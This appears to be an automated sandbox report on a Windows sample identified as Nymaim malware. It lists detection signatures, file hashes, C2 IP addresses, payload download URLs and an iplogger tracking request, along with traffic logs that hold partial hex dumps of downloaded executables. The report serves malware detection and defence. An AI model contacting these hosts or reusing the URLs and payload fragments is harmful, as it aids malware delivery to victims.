Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 715150
MD5: a3b774ed5023f56970eea0668ae65703
SHA1: 3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256: f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Tags: exe
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: file.exe ReversingLabs: Detection: 47%
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst URL Reputation: Label: malware
Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://85.31.46.167/software.phpZ Virustotal: Detection: 5% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] ReversingLabs: Detection: 28%
Source: file.exe Joe Sandbox ML: detected
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Networking

barindex
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe DNS query: name: iplogger.org
Source: Malware configuration extractor IPs: 208.67.104.97
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Joe Sandbox View ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View IP Address: 148.251.234.83 148.251.234.83
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php$
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpCoo
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpO
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpP
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpZ
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpl
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpll
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpstem32
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpx
Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://en.w
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr String found in binary or memory: http://upx.sf.net
Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agfamonotype.
Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled.
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designerseK
Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersers
Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersp
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersrsivo
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: https://g-cleanit.hk
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org
